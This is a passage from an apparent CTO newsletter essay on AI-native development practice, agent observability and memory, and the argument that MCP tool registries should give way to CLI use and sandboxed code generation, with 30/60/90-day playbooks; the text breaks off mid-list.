HITL via PR before anything merges. Architecture not just well defined, but explicit enough that agents can coordinate without colliding, and which treats them as junior engineers on a large codebase, because that&#8217;s what they are. </p><p>The Codex 5.3 approach OTOH, keeps the human in the steering position throughout,  a sort of evolved pair coding style (assuming the human observer is actually reviewing the llm driver&#8217;s code); with comprehension re-embedded in the workflow rather than replaced by architecture. Both routes are defensible. But they're answers to different questions, and the choice between them reveals something you've already decided: whether human comprehension is a bottleneck to be architected around, or the load-bearing element your pipeline is built to support. There&#8217;s a fair amount riding on this; the infrastructure requirements are different, the observability needs are different, and the trust models are completely different. Choosing without knowing which question you're answering is how you write your own post-mortem.</p><p>The conventional wisdom is that senior engineers are spending more time reviewing AI output. While empirically true, this misses the point on two fronts. First, the bottleneck has shifted from writing code to ensuring correctness (and there's no formal verification coming to save anyone's bacon.) Second, the review itself is structurally harder than reviewing human output, not because of volume but because the implicit contractual knowledge being validated has no spec, no artifact, and no name. Which is precisely why their job isn't to review it at all; it's to build the infrastructure upstream that makes machine output trustworthy before it needs review: types, contracts, decomposition, observability. PR review as last line of defense is what you have when nothing upstream is doing the work.</p><p>The same dynamic is playing out in open source without any real organizational resources to absorb it. <a href="https://github.com/godotengine/godot">Godot</a>&#8217;s lead maintainer described sorting AI-generated PRs as draining and demoralizing. Daniel Stenberg <a href="https://daniel.haxx.se/blog/2026/01/26/the-end-of-the-curl-bug-bounty/">closed</a> cURL&#8217;s bug bounty after genuine vulnerability reports dropped to roughly 5% of submissions. Tldraw <a href="https://github.com/tldraw/tldraw/issues/7695">closed to external contributions</a> entirely. (Tho strangely didn&#8217;t actually update <a href="https://github.com/tldraw/tldraw/blob/main/CONTRIBUTING.md">CONTRIBUTING.md</a>) GitHub is reportedly considering a kill switch for pull requests, which are still the fundamental mechanism by which open source actually functions. Playing out in the specification gap operating at the commons level: the vibe coding productivity &#8220;gain&#8221; as seen by those being subject to the externalized excise tax. </p><p>This is not primarily a story about OSS community health, though it is that. The libraries your company&#8217;s stack depends on are maintained by people being bombarded with squalls of LLM generated PRs announcing the impending tsunami despite the fact it&#8217;s not making an appearance in most orgs&#8217; risk registers yet.</p><h3>What This Means For CTOs</h3><blockquote><p><em>The CTO&#8217;s job is actually not to answer this question. It&#8217;s to reframe it.</em></p></blockquote><p><strong>One year in, the two conversations</strong>&#8212;vibe coding vs. AI-native SDLC, individual productivity vs. organizational transformation, internal senior engineers vs. external OSS maintainers&#8212;are all the same conversation at two scales. Cognitive debt accumulates wherever the comprehension loop gets removed without replacement. Internally, it lands on senior engineers doing additional verification work. Externally, it lands on OSS maintainers absorbing the review burden vibe-coders aren&#8217;t paying. </p><p>AI-native SDLC internalizes these costs deliberately: types as load-bearing infrastructure rather than code quality tooling, decomposition as prerequisite rather than aspiration, wide observability (aka &#8216;structured&#8217; logs, tho I&#8217;m not a fan of the nomenclature) as connective tissue, and HITL as the explicit mechanism for validating what no formal spec captures. But it&#8217;s more expensive upfront, which is exactly why most orgs resist it until something breaks. </p><p>Successful orgs (at least the ones successful enough for their CTOs to get away for lunch) aren&#8217;t the ones running the most aggressive vibe-coding culture, and they&#8217;re not the ones who landed on the right vendor. They&#8217;re the ones who understood that build-or-buy was the wrong question, that choosing between Cursor and Claude Code teams and GitHub Agents (launched late January and met with hoots)  is answering a procurement question wrapped in the language of transformation. The transformation question is what the development pipeline looks like on the other side, what has to be structurally true before agents operate safely at scale, and what you&#8217;re building toward. Most AI roadmaps are straddling the gap between these two questions. The incidents, of course, live in that gap.</p><p>The moment parallel agents are having will accelerate this, for the same reason the vibe coding moment did: the upside is visible and the prerequisite work is invisible (unless you&#8217;re using Swardley maps) right up until it isn&#8217;t. The CTO&#8217;s job in the room where the AI roadmap is being discussed (which in practice means the room where the CEO has said <em>we need to use AI, tell me how</em>) is not to answer that question. It&#8217;s to reframe it: what does the development pipeline look like on the other side, what organizational capabilities have to exist before agents operate safely at scale, and what are we building toward. That&#8217;s a different conversation. It&#8217;s also the one that determines whether the next Amazon incident is yours. </p><p>And you thought CTOs were risk-averse before.</p><h2><strong>AI Agents Run To Completion </strong></h2><p><strong>The Agentic Web has two requirements that have to work simultaneously:</strong> trust and observability. Trust without observability is recklessness. Observability without trust is security theater. Most organizations are discovering they have neither, which is why agent pilots aren&#8217;t graduating to production.</p><p>The question CTOs are asking&#8212;at least at lunch&#8212;is how do we give agents write access to production systems without creating a career-ending incident? The answer everyone seems to want is &#8220;better prompts&#8221; or &#8220;fine-tuning&#8221; or &#8220;guardrails.&#8221; But the answer that actually works is <strong>treating agent reasoning as infrastructure. </strong>How are we building this?</p><h3><strong>Reasoning as a Span</strong></h3><blockquote><p><em>Production-ready infrastructure doesn&#8217;t just ask 'what did the agent do,' but 'what was it thinking when it did it.</em></p></blockquote><p><strong>Google Cloud is automatically enabling OpenTelemetry ingestion endpoints</strong> for all projects starting March 4, 2026. This matters because modern observability infrastructure treats telemetry as first-class code, with automated agents using this data to perform self-healing deployments. The shift is from humans debugging what agents did, to agents debugging themselves using the same telemetry infrastructure. This is a fundamental change in Observability we are calling O11y 3.0. </p><p>Another important shift is what your implicit model of &#8216;coding&#8217; is, architecturally. Consider Github Agents, the somewhat anticipated product released late January by what is presumptively a top notch product engineering team, but which treats coding as a series of chat sessions, rather than a distributed systems problem, as Spotify&#8217;s Honk, for example, does. (Protip: <em>you can&#8217;t solve a layer 2 problem with a layer 1 tool</em>.) </p><p>OpenHands (formerly OpenDevin) hit v1.3.0 in February with full support for Agent Client Protocol (ACP), making it compatible with almost every modern IDE and CI/CD pipeline. The project has arguably become the most important open-source initiative in software engineering for 2026. Unlike closed agents where reasoning is opaque, you can see the "Thought Content" in OpenHands. The reasoning chain is visible, traceable, auditable. When an agent makes a decision, you can see why. When it fails, you can debug the reasoning.</p><p>This visible reasoning chain points to something bigger: when you pipe an agent&#8217;s chain into a modern traceability pipeline (Honeycomb, Chronosphere, Grafana Cloud), you treat AI reasoning like a first-class execution trace. Not as metadata or logs, but as spans in a distributed trace where you can see the decision chain that led to every action. No longer using system level events as proxy to infer explanation. </p><p>This is what production-ready agentic infrastructure looks like. When an agent makes a decision at 2am that takes down a service, you don&#8217;t reconstruct what happened from logs. You have the full reasoning trace showing: what context it had, what options it considered, why it chose what it did, what it expected to happen. The same infrastructure you use to debug <em>distributed systems</em> now debugs <em>distributed intelligence.</em></p><p>The architectural requirement is straightforward but most organizations haven&#8217;t built it: every agent action must generate a trace that captures both execution and reasoning. Thought Content provides a reasoning chain that can be captured via its event stream and exported to OpenTelemetry as custom span attributes or logs. Without this, you&#8217;re deploying black boxes to production and hoping nothing breaks in ways you can&#8217;t explain to compliance. Which is to say, nothing breaking. </p><h3><strong>Memory State Management for Agents</strong></h3><blockquote><p><em>Organizations treating agent memory as 'just a bigger context window' are solving the wrong problem.</em></p></blockquote><p>Snowflake Cortex fully integrated AI functions into standard SQL in February, allowing real-time text-to-SQL and unstructured data analysis without leaving the warehouse. MongoDB&#8217;s Voyage 4 models set new standards for retrieval accuracy in RAG. But the real shift is episodic memory: platforms introducing &#8216;state management&#8217; for agents directly on the data tier. </p><p>This is the convergence of the agentic data stack. Agents don&#8217;t just query databases. They maintain long-term memory of previous transactions and interactions stored directly in the data <em>layer</em>. When an agent needs to understand what happened last week or why a previous decision was made, that&#8217;s not in a prompt or a context window. It&#8217;s not even in a database per se, but committed to the agent&#8217;s knowledge graph: versioned, queryable, auditable, and in principle, (can be) content-addressable.</p><p>Mastra&#8217;s Datasets (18 Feb) exemplify this: versioned test cases with native JSON schema validation and SCD-2 versioning (the data warehousing technique of using surrogate keys for immutable updates.) What&#8217;s interesting here is an ostensible application framework is taking on deployment responsibilities. The primary use case isn&#8217;t running the agent, it&#8217;s providing a fully hydrated test harness for every agent release. Their Observational Memory (OM) hit 94.87% on LongMemEval with GPT-5-mini, which matters less as a benchmark than as a pattern: agents need memory systems that persist across sessions, survive restarts, and provide context without consuming the entire context window. Organizations treating agent memory as &#8220;just use a bigger context window&#8221; (or even a better managed one) are solving the wrong problem. This is how the AI-native SDLC in general, and reasoning as infrastructure in particular collapse the stack to solve the problem of state compression. </p><h3><strong>Self-Healing Deployments</strong></h3><blockquote><p><em>The new standard isn't 'alerting'; it's the collapse of the stack, where observability data becomes the direct input for autonomous self-healing</em></p></blockquote><p>The breakthrough is closed-loop systems where measurement, action, and learning happen in the same stroke. Google Cloud&#8217;s OTEL announcement isn&#8217;t so much about better dashboards, though that&#8217;s a welcome side effect. The bigger impact is on agents using telemetry to automatically remediate issues without human intervention. Not &#8216;alert the on-call engineer.&#8217; Execute the fix, document what was done, update the runbook. It&#8217;s what puts the &#8216;great&#8217; in <a href="/__u/ctolunchnyc.substack.com/p/the-great-ai-replacement">The Great Replacement</a>.</p><p>This only works if the observability infrastructure captures agent reasoning. When an agent makes a breaking change at 2am, the telemetry needs to show: what failure it detected, what remediation options it considered, why it chose this specific fix, what it expected the outcome to be. If something goes wrong, you&#8217;re not reconstructing from logs. You&#8217;re replaying the reasoning trace along side (CQRS) commands to understand what the agent got wrong.</p><p>Companies actually shipping this aren&#8217;t just treating observability as monitoring infrastructure, despite the name. They&#8217;re also treating it as the trust layer that makes autonomous execution possible. Without it, you have agents operating in production with no way to explain their decisions. With it, you have auditable, reproducible, debuggable autonomy. </p><h3><strong>The Trust Model That Provides Actual Guarantees</strong></h3><blockquote><p><em>The trust model that works isn&#8217;t 'limit what agents can do' &#8212; it&#8217;s &#8220;sandbox everything and make all reasoning auditable&#8221;</em></p></blockquote><p>The stark reality is that you can&#8217;t prevent agents from trying things you didn&#8217;t anticipate. (Just ask <a href="/__u/ctolunchnyc.substack.com/p/cracking-the-claw">OpenClaw</a>.) The trust model that works isn&#8217;t &#8220;limit what agents can do&#8221; (they&#8217;ll find ways around it). It&#8217;s &#8220;sandbox everything and make all reasoning auditable.&#8221; When agents generate code, you need runtime guarantees that even incorrect code can&#8217;t violate memory safety or create persistent vulnerabilities. When agents make decisions, you need telemetry that captures the reasoning chain. When agents maintain state, you need (vector) databases that version everything immutably</p><p>This is why Rust rewrites matter, but moreover why Pydantic&#8217;s <a href="https://github.com/pydantic/monty">Monty</a> is written in Rust.  Memory safety isn&#8217;t optional when you&#8217;re executing arbitrary code generated by AI. Following 2025&#8217;s regulatory pushes, 2026 has seen massive infrastructure rewrites. Major tech companies completing critical kernel and middleware rewrites in Rust to comply with new global memory-safety standards. The &#8220;memory-safe mandate&#8221; is forcing architectural decisions that seemed theoretical last year.</p><p>The architecture is: sandboxed execution <code>+</code> reasoning traces <code>+</code> episodic memory <code>+</code> self-healing remediation. Remove any component and production deployment becomes reckless. The majority of orgs have at most two of four. The gap between those with all four and those still workshopping governance is the space where CTOs, both FT and fractional need to put on their CDAO hat and conduct gap analysis. </p><h3><strong>CTO Playbook (30/60/90) </strong></h3><p><strong>Immediate (30 days):</strong> Implement reasoning traces for every agent in pilot. If you can&#8217;t reconstruct why an agent made a decision, you can&#8217;t deploy it. Use OpenTelemetry with agent-specific spans. Store traces for 90 days minimum. Build a dashboard showing agent decision paths for the last 1000 actions.</p><p><strong>Near-term (60 days):</strong> Deploy episodic memory infrastructure. Agents need persistent state that survives restarts. This isn&#8217;t &#8220;use a vector database.&#8221; It&#8217;s versioned, auditable state management with immutable updates. Take a look at Mastra&#8217;s Datasets approach and/or build equivalent. The test harness for agents needs to be as rigorous as your production CI/CD pipeline.</p><p><strong>Strategic (90 days):</strong> Migrate observability infrastructure to O11y 2.0. Not better logging. Telemetry as first-class code where agents can read their own traces and self-remediate. This is the unlock for autonomous operations. Without it, you&#8217;re stuck in human-in-the-loop forever.</p><p>The Agentic Web doesn&#8217;t wait for organizations to be ready. The question is whether your infrastructure can support what agents actually do, or whether you&#8217;re still treating them as chatbots with API access. The gap between these two approaches is the difference between production deployment and expensive demos that never ship.</p><h2><strong>Twilight of the MCP Idols</strong></h2><p><strong>Platforms are still rolling out MCP support like it&#8217;s the future.</strong> GitHub Copilot added MCP integration in mid-February. Supabase launched the ability to install MCP servers on Claude web and desktop. The announcements keep coming, partnerships keep forming, with Model Context Protocol being treated like the inevitable standard for AI tool integration. But, the paradigm it was built for is already being superseded.</p><p>Model Context Protocol was designed for a world where agents call predefined tools with known interfaces. It seemed like a good idea at the time.&#8482; You build a server, expose capabilities, agents discover and invoke them. It&#8217;s clean, it&#8217;s standardized, it&#8217;s infrastructure you can reason about. It was supposed to be the future. Still is, depending who you ask. But 15 months later, it hasn&#8217;t really taken off the way it was supposed to. And there are a number of reasons for that.</p><p>It doesn&#8217;t just demand predefined tools; it necessitates a curated registry. And registries live or die by discovery. But discovery is a trap; it entails organization, which in turn entails hierarchies, namespaces, and naming conventions. Every one of those layers, built out of metadata. To ensure a model actually picks the right tool, you have to account for every schema, every argument, and every edge case with somewhat agonizing clarity. All that overhead, the names, the descriptions, the structural scaffolding, is eventually shoved into the context window. Before the agent has even begun to think, it&#8217;s already choking on the user manual for its own toolbox.</p><h3><strong>Model Context Problematic</strong></h3><blockquote><p><em>MCP externalizes complexity into structure, and that structure has to live inside the model&#8217;s operating bandwidth.</em></p></blockquote><p><strong>While tool-centric models sound elegant in theory</strong>, in practice this paradigm creates drag. Each new edge case requires another tool. Every tool expands the registry. Context explodes. Maintenance spirals. And inevitably, agents encounter work that requires a capability that simply doesn&#8217;t exist yet. At some point the system stalls, not because the agent lacks reasoning ability, but because the infrastructure hasn&#8217;t pre-approved the interface, or the overhead overwhelms the model&#8217;s ability to call it.</p><p>This is where organizations committed to MCP are running into a wall. It&#8217;s often framed as an operational overhead problem: too many tools, too much maintenance. But that&#8217;s just the surface effect; the deeper issue is a stack-level misalignment: MCP pushes capability description into the prompt layer, where it has to compete with the model&#8217;s limited operating bandwidth. Every capability must be named, documented, parameterized, and injected into the context window before it can be used. The result is a compounding context tax of tens of thousands of tokens spent not on reasoning, but on explaining to the model what it&#8217;s allowed to do. </p><p>That overhead creates a second-order problem: selection. As the registry grows, agents don&#8217;t just gain capability, they inherit ambiguity. Developers respond by gating exposure, turning tools on and off, segmenting registries by task, user, or environment just to keep the model from making the wrong call. What was supposed to be a universal interface collapses into manual routing. (And routing is always <a href="https://arxiv.org/abs/2601.04416">problematic</a>.) </p><p>This creates a structural auth problem. Friction arises because we are asking the tool registry to carry the weight of the entitlement model: to keep the agent moving, you are forced to over-provision it. Because the registry lacks a unified model for composition, you end up granting broad, ambient credentials simply to avoid a permission-check stall mid-task. It&#8217;s the choice between a safely lobotomized agent or a dangerously over-privileged one. By treating authority as an external dependency rather than an architectural constraint, the registry creates a surface area that is technically integrated but morally incoherent. It can validate the call, but it cannot verify the intent. <strong>The result is a system that scales its surface area faster than it scales its usability</strong>: more tools, more tokens, more routing logic, more auth edge cases. At some point, the agent doesn&#8217;t fail because it lacks capability; it fails because the infrastructure required to describe that capability overwhelms it.</p><p>Critics often point to MCP&#8217;s &#8216;externalization&#8217; of authentication as a design flaw, but that&#8217;s an architectural misreading: MCP isn&#8217;t an Identity Provider (IdP); it&#8217;s a transport protocol. Think of MCP as providing the <strong>Passport</strong>, but it doesn&#8217;t issue the <strong>Visa</strong>. And when the visa is missing, the system doesn&#8217;t stall gracefully, it hands an agent the keys to the kingdom. Structurally, ambient credentials are granted not because the agent earned them, but because the alternative is a permission-check stall at every border crossing.</p><h3><strong>The Tool Generation</strong></h3><blockquote><p><em>The real architectural shift is not from heavy to disposable infrastructure; it&#8217;s from registry management to execution governance.</em></p></blockquote><p><strong>The engineering response to this structural failure hasn&#8217;t been unified.</strong> Two distinct approaches have arrived at the same wall from different directions, carrying different diagnoses and different remedies.</p><p>The first alternative sidesteps the registry entirely by dropping to a lower level of abstraction. Simon Willison has been the most sustained and credible voice here, and while he introduced the argument in early 2023, before MCP was a glimmer in David Soria Parra&#8217;s eye, it&#8217;s having a viral renaissance. The driver is a back-to-basics rebellion against registry bloat: when an MCP server requires 50,000 tokens of schema to do what a CLI command does in 200, the context tax drives you into contextual bankruptcy. CLI doesn&#8217;t replace the registry with a better execution model; moisturized and unbothered, it just ignores it. Shell commands have no registry entry. A Unix pipe chain requires no curated namespace. You write it, the model executes it. And critically: the model is good at this in a way that is not equally true of composing novel tool call chains. MCP isn&#8217;t represented in the model&#8217;s training set because it was literally invented at the end of 2024. But models have been trained on the entire public history of Unix shell scripting, however: every pipe, every flag, every composition pattern ever documented in every O&#8217;Reilly bible relegated to your back closet or donated to your local hacker house, since you can ask an LLM faster than you can look anything up. That&#8217;s a deep prior, and it shows in practice. Perplexity CTO Denis Yarats recently announced (<a href="https://x.com/morganlinton/status/2031795683897077965">internally</a>) they were abandoning MCP in favor of CLI. Shell-native agent patterns are architecturally underrated precisely  because they draw on capability the model already has, not needing to be injected at runtime through schema descriptions.</p><p>But where the CLI relies on existing priors, a second tradition replaces static infrastructure with adaptive infrastructure: tool-generation. Instead of humans defining every interface in advance, the AI defines the interface in response to the problem. This shift, from tool-calling to tool-generation doesn&#8217;t so much extend MCP as pressure it toward its final boss form.</p><p>Pydantic&#8217;s <a href="https://github.com/pydantic/monty">Monty</a>, a Python interpreter in Rust purpose built specifically for AI, flips the direction of abstraction. Agents don&#8217;t call tools from a predefined registry; they generate them. They write the code, execute it inside a constrained environment, retrieve the result, and discard the artifact. There is no persistent catalog to maintain, no discovery layer to inject into context, no long-lived interface contracts to curate. The capability exists only for the duration of the task and disappears when the task completes. That is obviously a materially different operating model. What&#8217;s less obvious is whether this approach requires abandoning the protocol or simply rethinking what it&#8217;s for.</p><p>It would be na&#239;ve, however, to suggest that tool generation &#8220;just&#8221; requires a sandbox. A trusted execution environment is necessary, but it&#8217;s not sufficient. Models can hallucinate logic, make incorrect assumptions, write inefficient or dangerous code, or attempt operations outside their intended scope. The real architectural shift is not from heavy to disposable infrastructure; it&#8217;s from registry management to execution governance. Instead of maintaining an ever-expanding inventory of predefined capabilities, you constrain what can be executed (by enforcing strict runtime guarantees: resource limits, capability gating, I/O control, and isolation boundaries.)</p><h3><strong>Overcoming Structural Inertia</strong></h3><blockquote><p><em>Momentum is flowing from the compounded accumulation of persistent catalogs toward operationalized containment.</em> </p></blockquote><p><strong>The difference is quintessentially structural.</strong> Tool registries accumulate surface area over time. They grow, ossify, and eventually become a maintenance burden embedded directly inside the model&#8217;s context window. Tool generation, by contrast, avoids persistent capability sprawl but demands a tightly controlled execution substrate. One model compounds through accumulation. The other operates through containment. That&#8217;s the architectural tradeoff, and it&#8217;s not exactly trivial in either direction.</p><p>The platforms adding MCP support in 2026 aren&#8217;t wrong to do so. MCP still solves real problems for enterprise contexts where predefined tools with audit trails matter. Financial services doesn&#8217;t want agents generating ad-hoc database queries. Healthcare doesn&#8217;t want agents writing tools that touch patient data without explicit permission models. For regulated industries, tool use with its paper trail and defined boundaries is a feature, not a limitation, though it does come with a cost.</p><p>But for the majority of use cases? From data transformation and API calls to file operations and computation, tool generation promises to be faster, simpler, and doesn&#8217;t require increasingly crufty infrastructure. Why maintain an MCP server that exposes a CSV parsing tool when the agent can just write the parser it needs for the specific CSV format it encountered? The salient question at that point is why not just use a CLI tool. </p><p>The momentum behind MCP might just be inertia. Organizations announced support months ago. Engineering teams built integrations. Product roadmaps got written. None of that stops just because the paradigm shifted. The question is whether we&#8217;re seeing genuine adoption or just the slow realization that the architecture doesn&#8217;t fit the problem anymore. Desktop clients like <a href="http://creature.run">Creature.run</a> perfectly illustrate the <strong>inertia vs. momentum</strong> thesis. They let teams build and share interactive MCP Apps (React widgets as predefined tools) with slick tabbed UIs and shared state between human/agent. Enterprise catnip (local storage, SOC2, per-seat pricing) but potentially pure inertia: more beautiful scaffolding compounding registry surface area, seducing teams to invest in exactly what MCP can&#8217;t sustain. Meanwhile momentum is flowing from the compounded accumulation of persistent catalogs toward operationalized containment. </p><h3><strong>Architecture and Morality</strong></h3><blockquote><p><em>If your agents are going to generate and execute code, you need a runtime that can&#8217;t be exploited even when the code is wrong.</em></p></blockquote><p><strong>The trust boundary is where the CLI and tool-generation traditions stop</strong> being parallel conversations and start mapping onto a two-dimensional space: flexibility on one axis, governance on the other.</p><p>CLI sits at maximum flexibility, minimum governance. The system&#8217;s Hands. For an agent operating within a single principal&#8217;s environment on reversible operations, CLI is not merely functional, but naturally self-enforcing. CLI enforces correctness architecturally, with no room for ambiguity. Exit codes are a contract. Stderr is a first-class signal. Idempotency is baked into the conventions. Piped commands either compose or they fail loudly; there is no silent middle state where something half-worked and left the system corrupted. The architecture itself is the governance layer. You don&#8217;t need an entitlement model when the operations are atomic, reversible, and scoped to a single principal&#8217;s environment, because the shell will tell you exactly what happened and exactly what didn&#8217;t. This deep structural virtue of CLI is why shell-native agent patterns work as well as they do in contained contexts.</p><p>But that virtue only holds when the environment is contained. CLI has no entitlement model because it never needed one. MCP&#8217;s process isolation, scoped credentials, and audit trails are an answer to the question CLI was never designed to ask: on whose authority did this agent act, and how do we know? Underneath the registry MCP was being asked to maintain, authority and capability are distinct layers with different operational envelopes, and conflating them in the same interface was the registry&#8217;s fatal mistake. When the agent is operating on a production database twelve teams depend on, ambient correctness becomes ambient liability. Nothing in the architecture distinguishes a reversible operation from an irreversible one, a local file from a shared dependency, a test environment from production. Allowing CLI to be the entitlement layer is what produces &#8216;delete root&#8217; hallucinations: the architecture was never designed to ask who authorized the action in the first place.</p><p>Tool-generation without a protocol is the mirror failure. A brain without a passport is ungovernable at scale. Ephemeral code execution is powerful precisely because it is opaque, synthesized on the fly, discarded after one-time use. This same opacity is a feature in a single-principal context and a liability in a multi-principal one. It&#8217;s a Rumsfeldian problem: you cannot audit what has left no trace of its execution. </p><h3>In Runtime We Trust</h3><blockquote><p><em>Inertia tends to force tradeoffs. Momentum tends to favor convergence. <br>MCP governs the envelope; runtime governs its execution.</em> </p></blockquote><p><strong>Anthropic&#8217;s Programmatic Tool Calling</strong> (<a href="http://platform.claude.com/docs/en/agents-and-tools/tool-use/programmatic-tool-calling">announced 18 Feb</a>) points toward a synthesis. Instead of agents discovering tools at runtime through MCP, you define tool schemas programmatically and the model decides when to invoke them. Halfway between predefined tools and generated tools: structured enough for audit trails, flexible enough to adapt to context. Whether it becomes the new standard or just another transition point depends on whether it solves the trust problem.</p><p>Because that&#8217;s what MCP always needed to solve: trust. (Thankfully, no one suggested using a blockchain for this.) If agents are going to operate autonomously, humans need to understand what capabilities they have access to. Predefined tools with known interfaces provide that understanding. Generated tools are opaque until they execute. The trust model breaks.</p><p>Except the trust model already broke. Agents with access to MCP servers can chain tool calls in ways humans didn&#8217;t anticipate. The illusion of control through predefined interfaces dissolves the moment agents start composing tools creatively. At which point, it&#8217;s less about what MCP was actually preventing and more what MCP becomes when the boundaries it drew are enforced at the runtime level instead. </p><p>Because the control plane has moved. In traditional software architecture it lives in your infrastructure: the code you wrote, the permissions you configured, the boundaries you drew. In agentic architecture it migrates into the agent&#8217;s reasoning layer. The agent decides what to do, when to do it, and how to compose its capabilities. That shift means the governance layer constraining those decisions cannot be ambient. It must be explicit, verifiable, and auditable after the fact. </p><p>A passport only works if something real is checking it at the border. When agents generate code inside a governance envelope, you need a runtime that can&#8217;t be exploited even when the code is wrong. But in the &#8216;OG&#8217; MCP paradigm, the passport is checked at the Registry level (<em>Is this agent allowed to see the &#8216;Delete Database&#8217; tool?)</em> In a world of tool-generation, that border shifts to the Execution Substrate: Instead of gating access to <em>functions</em>, we gate access to <em>resources</em> (I/O, Memory, Network) inside the sandbox. </p><p>This is where the shift from C to Rust stops being an infrastructure preference and becomes a mandate. The momentum behind porting critical infrastructure from C to Rust has been building for years, but AI acceleration is forcing the timeline. Monty is the first clear realization: AI-generated Python executing in a Rust-hardened sandbox, with memory safety guaranteed at the runtime level. If the agent generates a script to exfiltrate data, it shouldn&#8217;t fail because it lacks the &#8220;Exfiltrate Tool&#8221;; it should fail because the Runtime (a Rust-hardened container like Monty or a Deno isolate) detects an unauthorized outbound socket. As that same substrate appears inside MCP itself, the convergence becomes visible: MCP governs the identity of the agent making the request; the Runtime governs the integrity of the action. The passport finally has a trust border. </p><h3><strong>Convergence Not Collapse</strong></h3><blockquote><p><em>Asking the wrong layer to do another layer&#8217;s job is what produces collapse. Asking the right layer to operate within its domain is what produces convergence.</em></p></blockquote><p>Cloudflare&#8217;s <a href="https://blog.cloudflare.com/code-mode-mcp/">Code Mode MCP</a> server covers the entire Cloudflare API (over 2,500 endpoints) with two tools and roughly 1,000 tokens. An equivalent server built the traditional way would consume 1.17 million tokens, more than the full context window of the most advanced models available. The registry problem, in other words, doesn&#8217;t require abandoning MCP to solve. It requires abandoning the assumption that tools and capabilities need to be the same thing.</p><p>The server exposes two primitives: <code>search()</code> and <code>execute()</code>. The agent writes code against a typed representation of the API spec, runs it in a sandboxed isolate, and gets back only what it needs. No catalog. No discovery layer injected into context. No long-lived interface contracts. The capability exists for the duration of the call and disappears. That should sound familiar: it&#8217;s structurally identical to what Monty does, except that it lives entirely within MCP&#8217;s envelope.</p><p>Cloudflare&#8217;s Code Mode moves beyond tool-calling, tool-generation, or programmatic compromise by using MCP as a runtime for implementation-on-demand against a static API spec. The architectural question is no longer tool-calling versus tool-generation or a compromise mutation. It&#8217;s whether MCP, in absorbing the tool-generation substrate needed to survive, is still the thing it was designed to be. Or whether it&#8217;s transforming into something else: a governance layer, an auth boundary, a trust envelope, with code execution safely doing the actual work underneath.</p><p>The same pattern is now appearing as portable infrastructure. Port of Context (<a href="https://github.com/portofcontext/pctx/releases/tag/pctx-py-v0.3.0">pctx-py v0.3.0</a>) is a TypeScript code execution engine for AI agents: tool schemas for the governance layer, a sandboxed Deno runtime for execution, Rust callbacks for memory safety. Cloudflare Code Mode as a portable primitive, decoupled from any single platform, available to any agent stack. At the CLI layer, Vercel&#8217;s Playwright CLI wrapper (<a href="https://agent-browser.dev/">agent-browser.dev</a>) routes browser automation through the shell rather than a protocol abstraction, the hands doing the hands&#8217; job with near-zero context cost. Four independent implementations. One architecture: MCP as entitlement envelope, code generation as implementation substrate, CLI as the interop escape hatch for low-level systems that haven&#8217;t been and shouldn&#8217;t be abstracted into a protocol.</p><p>To state the architecture plainly:</p><ul><li><p>The call registry (MCP) is for entitlement. It defines who the agent is and what domain it is permitted to touch. It is the passport. </p></li><li><p>The generator (Code Mode, Monty, pctx) is for implementation. It handles the context tax by replacing thousands of specific tools with generic primitives that synthesize logic on the fly. It is the brain. </p></li><li><p>The shell, CLI, is for interop. It is the escape hatch for low-level systems that haven&#8217;t been abstracted into a protocol, operated by a single principal, on reversible operations. It is the hands.</p></li></ul><p>The three-layer model describes the mature architecture. Most engineers are asking a more practical question: which layer should I be using? The honest answer is that the layers are not always co-present and are not equally necessary. CLI is a complete architecture for single-principal, reversible, contained operations and not merely the interop escape hatch of a larger stack. Tool generation is a complete architecture when the capability surface is dynamic and the context tax of describing it exceeds the cost of synthesizing it on demand. MCP earns its place only when trust boundaries exist between principals, when someone will eventually need to answer the on whose authority question. If there are no borders, the passport is just paperwork.</p><p>The collapse diagnostic still applies even when only one layer is present. The question is never &#8216;which layer am I using?&#8217; but &#8216;am I asking this layer to do something it wasn&#8217;t designed for?&#8217; Each failure has the same shape: a layer doing another layer&#8217;s job. You can see it concretely. MCP tryna carry implementation weight through predefined interfaces. CLI tryna answer for irreversible operations across principals. Tool generation tryna operate without an audit trail across trust boundaries.</p><p>&#8220;MCP is dead&#8221; is a reaction to the first collapse, specifically to registries asked to carry implementation weight they were never designed to bear. The correct response is not abandoning the protocol. It is returning MCP to its correct job and recognizing that the brain and the hands were always going to be different layers. The stack converges when the layers know their lane. It collapses when one of them doesn&#8217;t.</p><p>Framed this way, the three-layer model is not just a descriptive taxonomy; it&#8217;s a mental map for when to reach for what. Each layer dominates a domain. CLI dominates single-principal, reversible operations. Tool generation dominates dynamic capability synthesis. MCP dominates multi-principal, auditable trust boundaries. Asking the wrong layer to do the wrong job is what produces collapse. Asking the right layer to operate within its domain is what produces convergence.</p><h5 style="text-align: center;"><mark data-color="#fce5cd" style="background-color: rgb(252, 229, 205); color: rgb(0, 0, 0);"><span data-color="#980000" style="color: rgb(152, 0, 0);">This is part one of a three part series that continues in parts</span><span data-color="#0000ff" style="color: rgb(0, 0, 255);"> </span></mark><a href="http://antimemetics.blog/soul-of-a-new-markdown"><mark data-color="#fce5cd" style="background-color: rgb(252, 229, 205); color: rgb(0, 0, 0);"><span data-color="#0000ff" style="color: rgb(0, 0, 255);">two</span></mark></a><mark data-color="#fce5cd" style="background-color: rgb(252, 229, 205); color: rgb(0, 0, 0);"><span data-color="#980000" style="color: rgb(152, 0, 0);"> and</span><span data-color="#0000ff" style="color: rgb(0, 0, 255);"> </span></mark><a href="http://antimemetics.blog/mad-skills"><mark data-color="#fce5cd" style="background-color: rgb(252, 229, 205); color: rgb(0, 0, 0);"><span data-color="#0000ff" style="color: rgb(0, 0, 255);">three</span></mark></a><mark data-color="#fce5cd" style="background-color: rgb(252, 229, 205); color: rgb(0, 0, 0);"><span data-color="#980000" style="color: rgb(152, 0, 0);">. </span></mark></h5><h3><strong>CTO Playbook (30/60/90)</strong></h3><h4><strong>Immediate (30 days): </strong></h4><ul><li><p><strong>Audit the Registry:</strong> Identify every MCP server in your stack that has &gt;20 tools. Calculate the &#8220;Context Tax&#8221; (%age of prompt window wasted on static tool defs)</p></li><li><p><strong>Proof of Concept:</strong> Pick one complex API or workflow. Replace its MCP tools with 2 primitives search() + execute() to validate token reduction + sandboxed execution.</p></li><li><p><strong>Benchmark:</strong> Compare token overhead vs. Cloudflare Code Mode (1k tokens). Less than 10&#215; reduction? Redesign.</p></li></ul><h4><strong>Near-term (60 days):</strong></h4><ul><li><p><strong>Fork the Security Model:</strong> Shift security boundary from the <strong>Tool</strong> (RBAC at the function level) to the <strong>Runtime</strong> (Isolation at the execution level).</p></li><li><p><strong>Deploy 